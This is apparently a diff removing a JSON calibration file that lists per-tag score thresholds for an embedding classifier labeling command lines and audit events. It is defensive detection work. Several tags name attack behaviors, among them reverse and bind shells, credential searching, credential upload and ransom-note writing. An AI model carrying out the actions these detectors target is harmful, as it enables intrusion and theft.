- "tp_p50": 0.8112,
902
- "tp_samples": 133
903
- },
904
- "manage_data_processing_job": {
905
- "threshold": 0.5769,
906
- "tp_p50": 0.6949,
907
- "tp_samples": 961
908
- },
909
- "manage_database_backup": {
910
- "threshold": 0.5461,
911
- "tp_p50": 0.6699,
912
- "tp_samples": 535
913
- },
914
- "manage_infrastructure_backup": {
915
- "threshold": 0.5567,
916
- "tp_p50": 0.6702,
917
- "tp_samples": 628
918
- },
919
- "manage_snapshot": {
920
- "threshold": 0.633,
921
- "tp_p50": 0.7265,
922
- "tp_samples": 171
923
- },
924
- "manage_virtual_machine": {
925
- "threshold": 0.6352,
926
- "tp_p50": 0.721,
927
- "tp_samples": 177
928
- },
929
- "manage_vpn_connection": {
930
- "threshold": 0.6876,
931
- "tp_p50": 0.7393,
932
- "tp_samples": 129
933
- },
934
- "modify_audit_policy": {
935
- "threshold": 0.673,
936
- "tp_p50": 0.7862,
937
- "tp_samples": 139
938
- },
939
- "modify_auth_policy": {
940
- "threshold": 0.6065,
941
- "tp_p50": 0.712,
942
- "tp_samples": 143
943
- },
944
- "modify_bootloader": {
945
- "threshold": 0.6558,
946
- "tp_p50": 0.7349,
947
- "tp_samples": 113
948
- },
949
- "modify_business_config": {
950
- "threshold": 0.6255,
951
- "tp_p50": 0.7282,
952
- "tp_samples": 93
953
- },
954
- "modify_cache_data": {
955
- "threshold": 0.6291,
956
- "tp_p50": 0.7223,
957
- "tp_samples": 91
958
- },
959
- "modify_cloud_firewall": {
960
- "threshold": 0.7522,
961
- "tp_p50": 0.7984,
962
- "tp_samples": 135
963
- },
964
- "modify_cloud_identity": {
965
- "threshold": 0.7157,
966
- "tp_p50": 0.7793,
967
- "tp_samples": 100
968
- },
969
- "modify_cloud_identity_policy": {
970
- "threshold": 0.7051,
971
- "tp_p50": 0.7559,
972
- "tp_samples": 115
973
- },
974
- "modify_cloud_resource": {
975
- "threshold": 0.6439,
976
- "tp_p50": 0.727,
977
- "tp_samples": 129
978
- },
979
- "modify_cloud_secret": {
980
- "threshold": 0.7041,
981
- "tp_p50": 0.7499,
982
- "tp_samples": 129
983
- },
984
- "modify_cluster_auth_policy": {
985
- "threshold": 0.6812,
986
- "tp_p50": 0.7617,
987
- "tp_samples": 243
988
- },
989
- "modify_cluster_secret": {
990
- "threshold": 0.7642,
991
- "tp_p50": 0.8294,
992
- "tp_samples": 144
993
- },
994
- "modify_container_network": {
995
- "threshold": 0.638,
996
- "tp_p50": 0.7424,
997
- "tp_samples": 118
998
- },
999
- "modify_container_state": {
1000
- "threshold": 0.6873,
1001
- "tp_p50": 0.7834,
1002
- "tp_samples": 126
1003
- },
1004
- "modify_coordination_data": {
1005
- "threshold": 0.6861,
1006
- "tp_p50": 0.7466,
1007
- "tp_samples": 151
1008
- },
1009
- "modify_critical_system_path": {
1010
- "threshold": 0.5731,
1011
- "tp_p50": 0.6635,
1012
- "tp_samples": 115
1013
- },
1014
- "modify_database_account": {
1015
- "threshold": 0.6739,
1016
- "tp_p50": 0.7816,
1017
- "tp_samples": 126
1018
- },
1019
- "modify_database_data": {
1020
- "threshold": 0.6065,
1021
- "tp_p50": 0.7645,
1022
- "tp_samples": 333
1023
- },
1024
- "modify_database_replication": {
1025
- "threshold": 0.6684,
1026
- "tp_p50": 0.7543,
1027
- "tp_samples": 123
1028
- },
1029
- "modify_database_schema": {
1030
- "threshold": 0.6628,
1031
- "tp_p50": 0.7912,
1032
- "tp_samples": 201
1033
- },
1034
- "modify_dns_config": {
1035
- "threshold": 0.6421,
1036
- "tp_p50": 0.7378,
1037
- "tp_samples": 133
1038
- },
1039
- "modify_dynamic_loader": {
1040
- "threshold": 0.7476,
1041
- "tp_p50": 0.8144,
1042
- "tp_samples": 110
1043
- },
1044
- "modify_file_acl": {
1045
- "threshold": 0.7438,
1046
- "tp_p50": 0.8049,
1047
- "tp_samples": 127
1048
- },
1049
- "modify_file_permission": {
1050
- "threshold": 0.5536,
1051
- "tp_p50": 0.7175,
1052
- "tp_samples": 476
1053
- },
1054
- "modify_file_timestamp": {
1055
- "threshold": 0.6799,
1056
- "tp_p50": 0.7714,
1057
- "tp_samples": 178
1058
- },
1059
- "modify_firewall_policy": {
1060
- "threshold": 0.7208,
1061
- "tp_p50": 0.7997,
1062
- "tp_samples": 582
1063
- },
1064
- "modify_group_identity": {
1065
- "threshold": 0.6993,
1066
- "tp_p50": 0.7892,
1067
- "tp_samples": 126
1068
- },
1069
- "modify_group_membership": {
1070
- "threshold": 0.6811,
1071
- "tp_p50": 0.7655,
1072
- "tp_samples": 363
1073
- },
1074
- "modify_infrastructure_account": {
1075
- "threshold": 0.6202,
1076
- "tp_p50": 0.7106,
1077
- "tp_samples": 153
1078
- },
1079
- "modify_infrastructure_config": {
1080
- "threshold": 0.517,
1081
- "tp_p50": 0.6848,
1082
- "tp_samples": 1085
1083
- },
1084
- "modify_kernel_memory": {
1085
- "threshold": 0.7833,
1086
- "tp_p50": 0.8242,
1087
- "tp_samples": 100
1088
- },
1089
- "modify_kernel_parameter": {
1090
- "threshold": 0.6275,
1091
- "tp_p50": 0.7837,
1092
- "tp_samples": 133
1093
- },
1094
- "modify_language_dependency": {
1095
- "threshold": 0.6477,
1096
- "tp_p50": 0.7255,
1097
- "tp_samples": 242
1098
- },
1099
- "modify_library_preload": {
1100
- "threshold": 0.7431,
1101
- "tp_p50": 0.8485,
1102
- "tp_samples": 127
1103
- },
1104
- "modify_mail_queue": {
1105
- "threshold": 0.7433,
1106
- "tp_p50": 0.7864,
1107
- "tp_samples": 112
1108
- },
1109
- "modify_mount_state": {
1110
- "threshold": 0.6737,
1111
- "tp_p50": 0.8142,
1112
- "tp_samples": 192
1113
- },
1114
- "modify_object_storage": {
1115
- "threshold": 0.6752,
1116
- "tp_p50": 0.7456,
1117
- "tp_samples": 138
1118
- },
1119
- "modify_package_execution_hook": {
1120
- "threshold": 0.6732,
1121
- "tp_p50": 0.7588,
1122
- "tp_samples": 129
1123
- },
1124
- "modify_pam_policy": {
1125
- "threshold": 0.6691,
1126
- "tp_p50": 0.8023,
1127
- "tp_samples": 121
1128
- },
1129
- "modify_process_memory": {
1130
- "threshold": 0.689,
1131
- "tp_p50": 0.779,
1132
- "tp_samples": 113
1133
- },
1134
- "modify_process_runtime_attributes": {
1135
- "threshold": 0.5753,
1136
- "tp_p50": 0.6802,
1137
- "tp_samples": 267
1138
- },
1139
- "modify_repository_hook": {
1140
- "threshold": 0.6592,
1141
- "tp_p50": 0.7283,
1142
- "tp_samples": 122
1143
- },
1144
- "modify_route": {
1145
- "threshold": 0.6932,
1146
- "tp_p50": 0.7889,
1147
- "tp_samples": 209
1148
- },
1149
- "modify_scheduled_task": {
1150
- "threshold": 0.6497,
1151
- "tp_p50": 0.7293,
1152
- "tp_samples": 232
1153
- },
1154
- "modify_security_module_policy": {
1155
- "threshold": 0.6747,
1156
- "tp_p50": 0.7325,
1157
- "tp_samples": 114
1158
- },
1159
- "modify_service_state": {
1160
- "threshold": 0.54,
1161
- "tp_p50": 0.6781,
1162
- "tp_samples": 1459
1163
- },
1164
- "modify_shell_history": {
1165
- "threshold": 0.6489,
1166
- "tp_p50": 0.7942,
1167
- "tp_samples": 121
1168
- },
1169
- "modify_shell_startup": {
1170
- "threshold": 0.6464,
1171
- "tp_p50": 0.7481,
1172
- "tp_samples": 112
1173
- },
1174
- "modify_source_code": {
1175
- "threshold": 0.6366,
1176
- "tp_p50": 0.7607,
1177
- "tp_samples": 297
1178
- },
1179
- "modify_source_repository": {
1180
- "threshold": 0.6355,
1181
- "tp_p50": 0.7734,
1182
- "tp_samples": 241
1183
- },
1184
- "modify_ssh_authorization": {
1185
- "threshold": 0.5857,
1186
- "tp_p50": 0.691,
1187
- "tp_samples": 165
1188
- },
1189
- "modify_ssh_policy": {
1190
- "threshold": 0.6132,
1191
- "tp_p50": 0.7817,
1192
- "tp_samples": 143
1193
- },
1194
- "modify_startup_script": {
1195
- "threshold": 0.7247,
1196
- "tp_p50": 0.7841,
1197
- "tp_samples": 109
1198
- },
1199
- "modify_storage_volume": {
1200
- "threshold": 0.638,
1201
- "tp_p50": 0.7401,
1202
- "tp_samples": 337
1203
- },
1204
- "modify_sudo_policy": {
1205
- "threshold": 0.6521,
1206
- "tp_p50": 0.785,
1207
- "tp_samples": 155
1208
- },
1209
- "modify_swap_state": {
1210
- "threshold": 0.7065,
1211
- "tp_p50": 0.8236,
1212
- "tp_samples": 119
1213
- },
1214
- "modify_symlink": {
1215
- "threshold": 0.6241,
1216
- "tp_p50": 0.7017,
1217
- "tp_samples": 162
1218
- },
1219
- "modify_system_config": {
1220
- "threshold": 0.6712,
1221
- "tp_p50": 0.7702,
1222
- "tp_samples": 317
1223
- },
1224
- "modify_system_time": {
1225
- "threshold": 0.7395,
1226
- "tp_p50": 0.8093,
1227
- "tp_samples": 125
1228
- },
1229
- "modify_systemd_unit": {
1230
- "threshold": 0.6609,
1231
- "tp_p50": 0.7728,
1232
- "tp_samples": 111
1233
- },
1234
- "modify_trust_store": {
1235
- "threshold": 0.6749,
1236
- "tp_p50": 0.7347,
1237
- "tp_samples": 137
1238
- },
1239
- "modify_user_access_state": {
1240
- "threshold": 0.6771,
1241
- "tp_p50": 0.7416,
1242
- "tp_samples": 207
1243
- },
1244
- "modify_user_identity": {
1245
- "threshold": 0.668,
1246
- "tp_p50": 0.7582,
1247
- "tp_samples": 105
1248
- },
1249
- "modify_verification_material": {
1250
- "threshold": 0.5682,
1251
- "tp_p50": 0.6479,
1252
- "tp_samples": 252
1253
- },
1254
- "modify_workload": {
1255
- "threshold": 0.6247,
1256
- "tp_p50": 0.7595,
1257
- "tp_samples": 753
1258
- },
1259
- "mount_host_into_container": {
1260
- "threshold": 0.5725,
1261
- "tp_p50": 0.6343,
1262
- "tp_samples": 161
1263
- },
1264
- "mount_remote_filesystem": {
1265
- "threshold": 0.7129,
1266
- "tp_p50": 0.8175,
1267
- "tp_samples": 129
1268
- },
1269
- "open_data_service_session": {
1270
- "threshold": 0.6567,
1271
- "tp_p50": 0.7699,
1272
- "tp_samples": 231
1273
- },
1274
- "perform_dns_zone_transfer": {
1275
- "threshold": 0.6909,
1276
- "tp_p50": 0.7905,
1277
- "tp_samples": 115
1278
- },
1279
- "plan_infrastructure_template": {
1280
- "threshold": 0.6305,
1281
- "tp_p50": 0.7397,
1282
- "tp_samples": 440
1283
- },
1284
- "port_forward_workload": {
1285
- "threshold": 0.6883,
1286
- "tp_p50": 0.8361,
1287
- "tp_samples": 157
1288
- },
1289
- "probe_database_service": {
1290
- "threshold": 0.6405,
1291
- "tp_p50": 0.7953,
1292
- "tp_samples": 415
1293
- },
1294
- "probe_multiple_endpoints": {
1295
- "threshold": 0.6461,
1296
- "tp_p50": 0.8002,
1297
- "tp_samples": 197
1298
- },
1299
- "probe_multiple_endpoints_multiple_ports": {
1300
- "threshold": 0.717,
1301
- "tp_p50": 0.8362,
1302
- "tp_samples": 272
1303
- },
1304
- "probe_multiple_endpoints_single_port": {
1305
- "threshold": 0.6594,
1306
- "tp_p50": 0.765,
1307
- "tp_samples": 191
1308
- },
1309
- "probe_remote_access_service": {
1310
- "threshold": 0.6128,
1311
- "tp_p50": 0.7295,
1312
- "tp_samples": 243
1313
- },
1314
- "probe_single_endpoint": {
1315
- "threshold": 0.7619,
1316
- "tp_p50": 0.8343,
1317
- "tp_samples": 457
1318
- },
1319
- "probe_single_endpoint_multiple_ports": {
1320
- "threshold": 0.6794,
1321
- "tp_p50": 0.7742,
1322
- "tp_samples": 274
1323
- },
1324
- "probe_single_endpoint_single_port": {
1325
- "threshold": 0.6609,
1326
- "tp_p50": 0.76,
1327
- "tp_samples": 354
1328
- },
1329
- "probe_web_application": {
1330
- "threshold": 0.6143,
1331
- "tp_p50": 0.7352,
1332
- "tp_samples": 598
1333
- },
1334
- "publish_message": {
1335
- "threshold": 0.6201,
1336
- "tp_p50": 0.7342,
1337
- "tp_samples": 171
1338
- },
1339
- "publish_source_repository": {
1340
- "threshold": 0.6537,
1341
- "tp_p50": 0.789,
1342
- "tp_samples": 121
1343
- },
1344
- "query_cache_data": {
1345
- "threshold": 0.6533,
1346
- "tp_p50": 0.7578,
1347
- "tp_samples": 168
1348
- },
1349
- "query_cloud_audit": {
1350
- "threshold": 0.7376,
1351
- "tp_p50": 0.8044,
1352
- "tp_samples": 173
1353
- },
1354
- "query_cloud_database": {
1355
- "threshold": 0.781,
1356
- "tp_p50": 0.8224,
1357
- "tp_samples": 104
1358
- },
1359
- "query_database_data": {
1360
- "threshold": 0.6365,
1361
- "tp_p50": 0.7773,
1362
- "tp_samples": 725
1363
- },
1364
- "query_dns_records": {
1365
- "threshold": 0.7176,
1366
- "tp_p50": 0.8202,
1367
- "tp_samples": 695
1368
- },
1369
- "query_service_health": {
1370
- "threshold": 0.5815,
1371
- "tp_p50": 0.7661,
1372
- "tp_samples": 1155
1373
- },
1374
- "read_auth_audit_log": {
1375
- "threshold": 0.5815,
1376
- "tp_p50": 0.7166,
1377
- "tp_samples": 401
1378
- },
1379
- "read_auth_policy": {
1380
- "threshold": 0.5913,
1381
- "tp_p50": 0.708,
1382
- "tp_samples": 255
1383
- },
1384
- "read_business_config": {
1385
- "threshold": 0.573,
1386
- "tp_p50": 0.7066,
1387
- "tp_samples": 556
1388
- },
1389
- "read_business_data": {
1390
- "threshold": 0.5044,
1391
- "tp_p50": 0.5981,
1392
- "tp_samples": 1378
1393
- },
1394
- "read_business_log": {
1395
- "threshold": 0.593,
1396
- "tp_p50": 0.8009,
1397
- "tp_samples": 662
1398
- },
1399
- "read_cloud_credentials": {
1400
- "threshold": 0.5766,
1401
- "tp_p50": 0.6589,
1402
- "tp_samples": 199
1403
- },
1404
- "read_cloud_metadata": {
1405
- "threshold": 0.6711,
1406
- "tp_p50": 0.7561,
1407
- "tp_samples": 121
1408
- },
1409
- "read_cloud_secret": {
1410
- "threshold": 0.6307,
1411
- "tp_p50": 0.824,
1412
- "tp_samples": 189
1413
- },
1414
- "read_cluster_context": {
1415
- "threshold": 0.5555,
1416
- "tp_p50": 0.6431,
1417
- "tp_samples": 186
1418
- },
1419
- "read_cluster_secret": {
1420
- "threshold": 0.612,
1421
- "tp_p50": 0.8,
1422
- "tp_samples": 197
1423
- },
1424
- "read_container_secret": {
1425
- "threshold": 0.5712,
1426
- "tp_p50": 0.6793,
1427
- "tp_samples": 180
1428
- },
1429
- "read_coordination_data": {
1430
- "threshold": 0.7039,
1431
- "tp_p50": 0.7474,
1432
- "tp_samples": 158
1433
- },
1434
- "read_credential_material": {
1435
- "threshold": 0.45,
1436
- "tp_p50": 0.539,
1437
- "tp_samples": 4514
1438
- },
1439
- "read_environment_variables": {
1440
- "threshold": 0.5342,
1441
- "tp_p50": 0.6371,
1442
- "tp_samples": 452
1443
- },
1444
- "read_identity_data": {
1445
- "threshold": 0.5427,
1446
- "tp_p50": 0.6972,
1447
- "tp_samples": 836
1448
- },
1449
- "read_infrastructure_config": {
1450
- "threshold": 0.4802,
1451
- "tp_p50": 0.597,
1452
- "tp_samples": 3428
1453
- },
1454
- "read_infrastructure_log": {
1455
- "threshold": 0.5814,
1456
- "tp_p50": 0.7718,
1457
- "tp_samples": 863
1458
- },
1459
- "read_kernel_memory": {
1460
- "threshold": 0.6746,
1461
- "tp_p50": 0.7444,
1462
- "tp_samples": 106
1463
- },
1464
- "read_kernel_parameter": {
1465
- "threshold": 0.7379,
1466
- "tp_p50": 0.8214,
1467
- "tp_samples": 128
1468
- },
1469
- "read_kernel_state": {
1470
- "threshold": 0.6215,
1471
- "tp_p50": 0.7531,
1472
- "tp_samples": 214
1473
- },
1474
- "read_login_history": {
1475
- "threshold": 0.6663,
1476
- "tp_p50": 0.8171,
1477
- "tp_samples": 245
1478
- },
1479
- "read_mailbox": {
1480
- "threshold": 0.6736,
1481
- "tp_p50": 0.7956,
1482
- "tp_samples": 126
1483
- },
1484
- "read_packet_capture": {
1485
- "threshold": 0.6958,
1486
- "tp_p50": 0.7678,
1487
- "tp_samples": 173
1488
- },
1489
- "read_process_memory": {
1490
- "threshold": 0.5784,
1491
- "tp_p50": 0.6404,
1492
- "tp_samples": 236
1493
- },
1494
- "read_process_runtime": {
1495
- "threshold": 0.6308,
1496
- "tp_p50": 0.7139,
1497
- "tp_samples": 82
1498
- },
1499
- "read_scheduled_task": {
1500
- "threshold": 0.596,
1501
- "tp_p50": 0.7036,
1502
- "tp_samples": 410
1503
- },
1504
- "read_secret_store": {
1505
- "threshold": 0.6412,
1506
- "tp_p50": 0.7354,
1507
- "tp_samples": 217
1508
- },
1509
- "read_service_metrics": {
1510
- "threshold": 0.6333,
1511
- "tp_p50": 0.7737,
1512
- "tp_samples": 858
1513
- },
1514
- "read_shell_history": {
1515
- "threshold": 0.6107,
1516
- "tp_p50": 0.7245,
1517
- "tp_samples": 215
1518
- },
1519
- "read_source_code": {
1520
- "threshold": 0.549,
1521
- "tp_p50": 0.6913,
1522
- "tp_samples": 1112
1523
- },
1524
- "read_source_repository": {
1525
- "threshold": 0.601,
1526
- "tp_p50": 0.7912,
1527
- "tp_samples": 469
1528
- },
1529
- "read_ssh_policy": {
1530
- "threshold": 0.5349,
1531
- "tp_p50": 0.6313,
1532
- "tp_samples": 479
1533
- },
1534
- "read_sudo_policy": {
1535
- "threshold": 0.6356,
1536
- "tp_p50": 0.7335,
1537
- "tp_samples": 264
1538
- },
1539
- "read_system_audit_log": {
1540
- "threshold": 0.6108,
1541
- "tp_p50": 0.7247,
1542
- "tp_samples": 215
1543
- },
1544
- "read_system_config": {
1545
- "threshold": 0.5395,
1546
- "tp_p50": 0.6907,
1547
- "tp_samples": 557
1548
- },
1549
- "read_system_log": {
1550
- "threshold": 0.5752,
1551
- "tp_p50": 0.7797,
1552
- "tp_samples": 455
1553
- },
1554
- "read_verification_material": {
1555
- "threshold": 0.5356,
1556
- "tp_p50": 0.686,
1557
- "tp_samples": 713
1558
- },
1559
- "read_workload_logs": {
1560
- "threshold": 0.6746,
1561
- "tp_p50": 0.8214,
1562
- "tp_samples": 474
1563
- },
1564
- "reboot_host": {
1565
- "threshold": 0.6714,
1566
- "tp_p50": 0.7429,
1567
- "tp_samples": 122
1568
- },
1569
- "recover_deleted_content": {
1570
- "threshold": 0.6919,
1571
- "tp_p50": 0.7543,
1572
- "tp_samples": 111
1573
- },
1574
- "remove_file_capability": {
1575
- "threshold": 0.8531,
1576
- "tp_p50": 0.8878,
1577
- "tp_samples": 105
1578
- },
1579
- "remove_immutable_file_attribute": {
1580
- "threshold": 0.7735,
1581
- "tp_p50": 0.8178,
1582
- "tp_samples": 110
1583
- },
1584
- "renew_access_token": {
1585
- "threshold": 0.6825,
1586
- "tp_p50": 0.7983,
1587
- "tp_samples": 104
1588
- },
1589
- "resize_filesystem": {
1590
- "threshold": 0.745,
1591
- "tp_p50": 0.8272,
1592
- "tp_samples": 111
1593
- },
1594
- "revoke_access_token": {
1595
- "threshold": 0.6846,
1596
- "tp_p50": 0.7537,
1597
- "tp_samples": 112
1598
- },
1599
- "revoke_cloud_privilege": {
1600
- "threshold": 0.7746,
1601
- "tp_p50": 0.836,
1602
- "tp_samples": 126
1603
- },
1604
- "revoke_database_privilege": {
1605
- "threshold": 0.7833,
1606
- "tp_p50": 0.8434,
1607
- "tp_samples": 114
1608
- },
1609
- "revoke_infrastructure_privilege": {
1610
- "threshold": 0.7092,
1611
- "tp_p50": 0.8013,
1612
- "tp_samples": 104
1613
- },
1614
- "revoke_user_privilege": {
1615
- "threshold": 0.8201,
1616
- "tp_p50": 0.8396,
1617
- "tp_samples": 105
1618
- },
1619
- "run_performance_test": {
1620
- "threshold": 0.6329,
1621
- "tp_p50": 0.747,
1622
- "tp_samples": 251
1623
- },
1624
- "scan_container_image": {
1625
- "threshold": 0.6877,
1626
- "tp_p50": 0.7855,
1627
- "tp_samples": 157
1628
- },
1629
- "search_capability_files": {
1630
- "threshold": 0.7841,
1631
- "tp_p50": 0.8165,
1632
- "tp_samples": 118
1633
- },
1634
- "search_credentials": {
1635
- "threshold": 0.5261,
1636
- "tp_p50": 0.6297,
1637
- "tp_samples": 1488
1638
- },
1639
- "search_sensitive_files": {
1640
- "threshold": 0.629,
1641
- "tp_p50": 0.7257,
1642
- "tp_samples": 224
1643
- },
1644
- "search_sgid_files": {
1645
- "threshold": 0.7293,
1646
- "tp_p50": 0.7849,
1647
- "tp_samples": 108
1648
- },
1649
- "search_suid_files": {
1650
- "threshold": 0.7008,
1651
- "tp_p50": 0.7931,
1652
- "tp_samples": 131
1653
- },
1654
- "search_world_writable_files": {
1655
- "threshold": 0.7411,
1656
- "tp_p50": 0.7918,
1657
- "tp_samples": 120
1658
- },
1659
- "securely_delete_data": {
1660
- "threshold": 0.6477,
1661
- "tp_p50": 0.7378,
1662
- "tp_samples": 163
1663
- },
1664
- "send_mail": {
1665
- "threshold": 0.6474,
1666
- "tp_p50": 0.7676,
1667
- "tp_samples": 119
1668
- },
1669
- "send_multiplexer_input": {
1670
- "threshold": 0.7005,
1671
- "tp_p50": 0.7629,
1672
- "tp_samples": 104
1673
- },
1674
- "set_environment_variable": {
1675
- "threshold": 0.5429,
1676
- "tp_p50": 0.6587,
1677
- "tp_samples": 379
1678
- },
1679
- "set_file_capability": {
1680
- "threshold": 0.7549,
1681
- "tp_p50": 0.8531,
1682
- "tp_samples": 118
1683
- },
1684
- "set_immutable_file_attribute": {
1685
- "threshold": 0.7521,
1686
- "tp_p50": 0.8391,
1687
- "tp_samples": 124
1688
- },
1689
- "set_sgid_permission": {
1690
- "threshold": 0.7021,
1691
- "tp_p50": 0.8087,
1692
- "tp_samples": 106
1693
- },
1694
- "set_suid_permission": {
1695
- "threshold": 0.6472,
1696
- "tp_p50": 0.8004,
1697
- "tp_samples": 136
1698
- },
1699
- "shutdown_host": {
1700
- "threshold": 0.7429,
1701
- "tp_p50": 0.8095,
1702
- "tp_samples": 101
1703
- },
1704
- "sign_artifact": {
1705
- "threshold": 0.6007,
1706
- "tp_p50": 0.7622,
1707
- "tp_samples": 194
1708
- },
1709
- "simulate_package_install": {
1710
- "threshold": 0.6904,
1711
- "tp_p50": 0.7734,
1712
- "tp_samples": 119
1713
- },
1714
- "spawn_bind_shell": {
1715
- "threshold": 0.6993,
1716
- "tp_p50": 0.7846,
1717
- "tp_samples": 141
1718
- },
1719
- "spawn_interactive_shell": {
1720
- "threshold": 0.6019,
1721
- "tp_p50": 0.7026,
1722
- "tp_samples": 323
1723
- },
1724
- "spawn_reverse_shell": {
1725
- "threshold": 0.6407,
1726
- "tp_p50": 0.762,
1727
- "tp_samples": 157
1728
- },
1729
- "stage_hidden_path": {
1730
- "threshold": 0.475,
1731
- "tp_p50": 0.5506,
1732
- "tp_samples": 1580
1733
- },
1734
- "stage_temporary_path": {
1735
- "threshold": 0.45,
1736
- "tp_p50": 0.5089,
1737
- "tp_samples": 5179
1738
- },
1739
- "switch_user": {
1740
- "threshold": 0.6584,
1741
- "tp_p50": 0.832,
1742
- "tp_samples": 103
1743
- },
1744
- "synchronize_remote_data": {
1745
- "threshold": 0.5402,
1746
- "tp_p50": 0.6308,
1747
- "tp_samples": 641
1748
- },
1749
- "terminate_process": {
1750
- "threshold": 0.6858,
1751
- "tp_p50": 0.8069,
1752
- "tp_samples": 286
1753
- },
1754
- "trace_file_access": {
1755
- "threshold": 0.6703,
1756
- "tp_p50": 0.7392,
1757
- "tp_samples": 125
1758
- },
1759
- "trace_process_execution": {
1760
- "threshold": 0.595,
1761
- "tp_p50": 0.6884,
1762
- "tp_samples": 246
1763
- },
1764
- "train_mail_filter": {
1765
- "threshold": 0.7662,
1766
- "tp_p50": 0.8258,
1767
- "tp_samples": 108
1768
- },
1769
- "transfer_container_image": {
1770
- "threshold": 0.6308,
1771
- "tp_p50": 0.7484,
1772
- "tp_samples": 360
1773
- },
1774
- "uninstall_package": {
1775
- "threshold": 0.7557,
1776
- "tp_p50": 0.8029,
1777
- "tp_samples": 140
1778
- },
1779
- "unload_ebpf_program": {
1780
- "threshold": 0.7393,
1781
- "tp_p50": 0.7854,
1782
- "tp_samples": 106
1783
- },
1784
- "unload_kernel_module": {
1785
- "threshold": 0.7794,
1786
- "tp_p50": 0.855,
1787
- "tp_samples": 112
1788
- },
1789
- "update_package": {
1790
- "threshold": 0.6416,
1791
- "tp_p50": 0.7497,
1792
- "tp_samples": 187
1793
- },
1794
- "update_source_repository": {
1795
- "threshold": 0.6496,
1796
- "tp_p50": 0.7976,
1797
- "tp_samples": 261
1798
- },
1799
- "upload_credential_material": {
1800
- "threshold": 0.5148,
1801
- "tp_p50": 0.6378,
1802
- "tp_samples": 607
1803
- },
1804
- "upload_external_content": {
1805
- "threshold": 0.4733,
1806
- "tp_p50": 0.6018,
1807
- "tp_samples": 1886
1808
- },
1809
- "upload_internal_content": {
1810
- "threshold": 0.5028,
1811
- "tp_p50": 0.6081,
1812
- "tp_samples": 948
1813
- },
1814
- "upload_named_content": {
1815
- "threshold": 0.571,
1816
- "tp_p50": 0.687,
1817
- "tp_samples": 608
1818
- },
1819
- "upload_object_storage": {
1820
- "threshold": 0.5927,
1821
- "tp_p50": 0.6976,
1822
- "tp_samples": 510
1823
- },
1824
- "upload_sensitive_content": {
1825
- "threshold": 0.4861,
1826
- "tp_p50": 0.6173,
1827
- "tp_samples": 1424
1828
- },
1829
- "verify_artifact_integrity": {
1830
- "threshold": 0.6114,
1831
- "tp_p50": 0.738,
1832
- "tp_samples": 624
1833
- },
1834
- "verify_auth_policy": {
1835
- "threshold": 0.6804,
1836
- "tp_p50": 0.7732,
1837
- "tp_samples": 226
1838
- },
1839
- "wipe_storage": {
1840
- "threshold": 0.6448,
1841
- "tp_p50": 0.7406,
1842
- "tp_samples": 114
1843
- },
1844
- "write_executable_content": {
1845
- "threshold": 0.5265,
1846
- "tp_p50": 0.6483,
1847
- "tp_samples": 555
1848
- },
1849
- "write_kernel_module_content": {
1850
- "threshold": 0.6192,
1851
- "tp_p50": 0.7012,
1852
- "tp_samples": 110
1853
- },
1854
- "write_ransom_note": {
1855
- "threshold": 0.7066,
1856
- "tp_p50": 0.7899,
1857
- "tp_samples": 119
1858
- },
1859
- "write_secret_store": {
1860
- "threshold": 0.6641,
1861
- "tp_p50": 0.732,
1862
- "tp_samples": 121
1863
- },
1864
- "write_shared_library_content": {
1865
- "threshold": 0.6284,
1866
- "tp_p50": 0.7173,
1867
- "tp_samples": 133
1868
- },
1869
- "write_system_executable_content": {
1870
- "threshold": 0.6197,
1871
- "tp_p50": 0.7028,
1872
- "tp_samples": 112
1873
- },
1874
- "write_web_script_content": {
1875
- "threshold": 0.6228,
1876
- "tp_p50": 0.7186,
1877
- "tp_samples": 142
1878
- }
1879
- },
1880
- "max_threshold": 0.95,
1881
- "min_label_samples": 5,
1882
- "model": "models/v4-tags-embedding/gte-modernbert-rev20-behavior-full-corpus/model",
1883
- "percentile": 10.0,
1884
- "prompt_profile": "mid",
1885
- "prompt_profile_experimental": false,
1886
- "query_prefix": "observed command line or audit event",
1887
- "runtime_seconds": 36.743,
1888
- "schema": "agentsmith_rev20_score_calibration_v1",
1889
- "split": "train",
1890
- "tag_prefix": "behavior tag definition"
1891
- }